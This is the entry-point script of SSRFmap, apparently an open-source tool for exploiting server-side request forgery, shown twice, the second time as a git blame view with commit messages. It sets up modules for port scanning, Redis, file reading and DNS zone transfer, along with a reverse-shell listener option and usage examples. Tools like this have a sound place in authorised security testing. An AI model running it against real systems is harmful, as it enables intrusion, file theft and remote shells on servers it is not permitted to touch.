SSRFmap/ssrfmap.py

#!/usr/bin/python
from core.ssrf import SSRF
import argparse
import logging
import urllib3

def display_banner():
    print(r" _____ _________________                     ") 
    print(r"/  ___/  ___| ___ \  ___|                    ")
    print(r"\ `--.\ `--.| |_/ / |_ _ __ ___   __ _ _ __  ")
    print(r" `--. \`--. \    /|  _| '_ ` _ \ / _` | '_ \ ")
    print(r"/\__/ /\__/ / |\ \| | | | | | | | (_| | |_) |")
    print(r"\____/\____/\_| \_\_| |_| |_| |_|\__,_| .__/ ")
    print(r"                                      | |    ")
    print(r"                                      |_|    ")

def parse_args():
    example_text = '''Examples:
    python ssrfmap.py -r examples/request2.txt -p url -m portscan
    python ssrfmap.py -r examples/request.txt -p url -m redis
    python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
    python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
    python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles 
    '''
    parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
    parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")
    parser.add_argument('-p', action ='store', dest='param',   help="SSRF Parameter to target")
    parser.add_argument('-m', action ='store', dest='modules', help="SSRF Modules to enable")
    parser.add_argument('-l', action ='store', dest='handler', help="Start an handler for a reverse shell", nargs='?', const='1')
    parser.add_argument('-v', action ='store_true', dest='verbose', help="Enable verbosity")
    parser.add_argument('--lhost', action ='store', dest='lhost',     help="LHOST reverse shell or IP to target in the network")
    parser.add_argument('--lport', action ='store', dest='lport',     help="LPORT reverse shell or port to target in the network")
    parser.add_argument('--ldomain', action ='store', dest='ldomain', help="Domain to target for AXFR query or domain related modules")
    parser.add_argument('--rfiles', action ='store', dest='targetfiles', help="Files to read with readfiles module", nargs='?', const=True)
    parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use")
    parser.add_argument('--ssl',   action ='store', dest='ssl',       help="Use HTTPS without verification", nargs='?', const=True)
    parser.add_argument('--proxy',   action ='store', dest='proxy',   help="Use HTTP(s) proxy (ex: http://localhost:8080)")
    parser.add_argument('--level', action ='store', dest='level',     help="Level of test to perform (1-5, default: 1)", nargs='?', const=1, default=1, type=int)
    results = parser.parse_args()
    
    if results.reqfile == None:
        parser.print_help()
        exit()

    return results

if __name__ == "__main__":
    # disable ssl warning for self signed certificate
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

    # enable custom logging
    logging.basicConfig(
        level=logging.INFO,
        format="[%(levelname)s]:%(message)s",
        handlers=[
            logging.FileHandler("SSRFmap.log", mode='w'),
            logging.StreamHandler()
        ]
    )

    logging.addLevelName(logging.WARNING, "\033[1;31m%s\033[1;0m" % logging.getLevelName(logging.WARNING))
    logging.addLevelName(logging.ERROR, "\033[1;41m%s\033[1;0m" % logging.getLevelName(logging.ERROR))
    display_banner()

    # handle verbosity
    args = parse_args()
    if args.verbose is True:
        logging.getLogger().setLevel(logging.DEBUG)
        logging.debug("Verbose output is enabled")

    # SSRFmap
    ssrf = SSRF(args)
MODULE - core + redis + fastcgi + portscan + readfile 2018-10-15 19:22:04 +00:00			`#!/usr/bin/python`
			`from core.ssrf import SSRF`
			`import argparse`
			`import logging`
BUGFIX - SSL warnings + https wrapper 2019-07-07 20:05:31 +00:00			`import urllib3`
- Added logging to file for better troubleshooting - Swapped instances of format() to use fstrings for readability, as some of the format calls were convoluted: - "".join("%{0:0>2}".format(format(ord(char), "x")) for char in string) => "".join([f"%{ord(char):0>2x}" for char in string]) - logging.info("Original file length: {}".format('{0:0{1}X}'.format(len(webshell_data),8))) => logging.info(f"Original file length: {len(webshell_data):08X}") - Added missing 'module launched' message for SMTP 2022-03-16 18:27:30 +00:00
MODULE - core + redis + fastcgi + portscan + readfile 2018-10-15 19:22:04 +00:00			`def display_banner():`
Fix SyntaxWarning 2024-06-08 18:59:26 +00:00			`print(r" _____ _________________ ")`
			`print(r"/ ___/ ___\| ___ \ ___\| ")`
			print(r"\ `--.\ `--.\| \|_/ / \|_ _ __ ___ __ _ _ __ ")
			print(r" `--. \`--. \ /\| _\| '_ ` _ \ / _` \| '_ \ ")
			`print(r"/\__/ /\__/ / \|\ \\| \| \| \| \| \| \| \| (_\| \| \|_) \|")`
			`print(r"\____/\____/\_\| \_\_\| \|_\| \|_\| \|_\|\__,_\| .__/ ")`
			`print(r" \| \| ")`
			`print(r" \|_\| ")`
MODULE - core + redis + fastcgi + portscan + readfile 2018-10-15 19:22:04 +00:00
			`def parse_args():`
INFRA - Examples added in argparse help() 2019-07-07 22:02:56 +00:00			`example_text = '''Examples:`
Dockerfile reworked + examples 2024-06-08 18:48:06 +00:00			`python ssrfmap.py -r examples/request2.txt -p url -m portscan`
			`python ssrfmap.py -r examples/request.txt -p url -m redis`
			`python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"`
			`python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242`
			`python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles`
INFRA - Examples added in argparse help() 2019-07-07 22:02:56 +00:00			`'''`
			`parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)`
MODULE - core + redis + fastcgi + portscan + readfile 2018-10-15 19:22:04 +00:00			`parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")`
			`parser.add_argument('-p', action ='store', dest='param', help="SSRF Parameter to target")`
			`parser.add_argument('-m', action ='store', dest='modules', help="SSRF Modules to enable")`
remove default value 2020-01-09 02:53:44 +00:00			`parser.add_argument('-l', action ='store', dest='handler', help="Start an handler for a reverse shell", nargs='?', const='1')`
Adding verbosity feature 2024-06-08 23:13:53 +00:00			`parser.add_argument('-v', action ='store_true', dest='verbose', help="Enable verbosity")`
AXFR module - DNS Zone Transfer 2024-06-10 12:56:13 +00:00			`parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell or IP to target in the network")`
			`parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell or port to target in the network")`
			`parser.add_argument('--ldomain', action ='store', dest='ldomain', help="Domain to target for AXFR query or domain related modules")`
Added the possibility to specify files via the --rflags parameter when using the readfiles module. 2021-02-02 22:34:38 +00:00			`parser.add_argument('--rfiles', action ='store', dest='targetfiles', help="Files to read with readfiles module", nargs='?', const=True)`
INFRA - SSL for HTTPS + UserAgent parameter 2019-02-18 12:33:24 +00:00			`parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use")`
			`parser.add_argument('--ssl', action ='store', dest='ssl', help="Use HTTPS without verification", nargs='?', const=True)`
Add HTTP proxy support 2022-03-23 10:45:34 +00:00			`parser.add_argument('--proxy', action ='store', dest='proxy', help="Use HTTP(s) proxy (ex: http://localhost:8080)")`
INFRA - SSL for HTTPS + UserAgent parameter 2019-02-18 12:33:24 +00:00			`parser.add_argument('--level', action ='store', dest='level', help="Level of test to perform (1-5, default: 1)", nargs='?', const=1, default=1, type=int)`
Added the possibility to specify files via the --rflags parameter when using the readfiles module. 2021-02-02 22:34:38 +00:00			`results = parser.parse_args()`
MODULE - core + redis + fastcgi + portscan + readfile 2018-10-15 19:22:04 +00:00
			`if results.reqfile == None:`
			`parser.print_help()`
			`exit()`

			`return results`

			`if __name__ == "__main__":`
BUGFIX - SSL warnings + https wrapper 2019-07-07 20:05:31 +00:00			`# disable ssl warning for self signed certificate`
			`urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)`

			`# enable custom logging`
- Added logging to file for better troubleshooting - Swapped instances of format() to use fstrings for readability, as some of the format calls were convoluted: - "".join("%{0:0>2}".format(format(ord(char), "x")) for char in string) => "".join([f"%{ord(char):0>2x}" for char in string]) - logging.info("Original file length: {}".format('{0:0{1}X}'.format(len(webshell_data),8))) => logging.info(f"Original file length: {len(webshell_data):08X}") - Added missing 'module launched' message for SMTP 2022-03-16 18:27:30 +00:00			`logging.basicConfig(`
			`level=logging.INFO,`
			`format="[%(levelname)s]:%(message)s",`
			`handlers=[`
			`logging.FileHandler("SSRFmap.log", mode='w'),`
			`logging.StreamHandler()`
			`]`
			`)`

Adding verbosity feature 2024-06-08 23:13:53 +00:00			`logging.addLevelName(logging.WARNING, "\033[1;31m%s\033[1;0m" % logging.getLevelName(logging.WARNING))`
			`logging.addLevelName(logging.ERROR, "\033[1;41m%s\033[1;0m" % logging.getLevelName(logging.ERROR))`
MODULE - core + redis + fastcgi + portscan + readfile 2018-10-15 19:22:04 +00:00			`display_banner()`
BUGFIX - SSL warnings + https wrapper 2019-07-07 20:05:31 +00:00
Adding verbosity feature 2024-06-08 23:13:53 +00:00			`# handle verbosity`
MODULE - core + redis + fastcgi + portscan + readfile 2018-10-15 19:22:04 +00:00			`args = parse_args()`
Adding verbosity feature 2024-06-08 23:13:53 +00:00			`if args.verbose is True:`
			`logging.getLogger().setLevel(logging.DEBUG)`
			`logging.debug("Verbose output is enabled")`

			`# SSRFmap`
Added the possibility to specify files via the --rflags parameter when using the readfiles module. 2021-02-02 22:34:38 +00:00			`ssrf = SSRF(args)`
Adding verbosity feature 2024-06-08 23:13:53 +00:00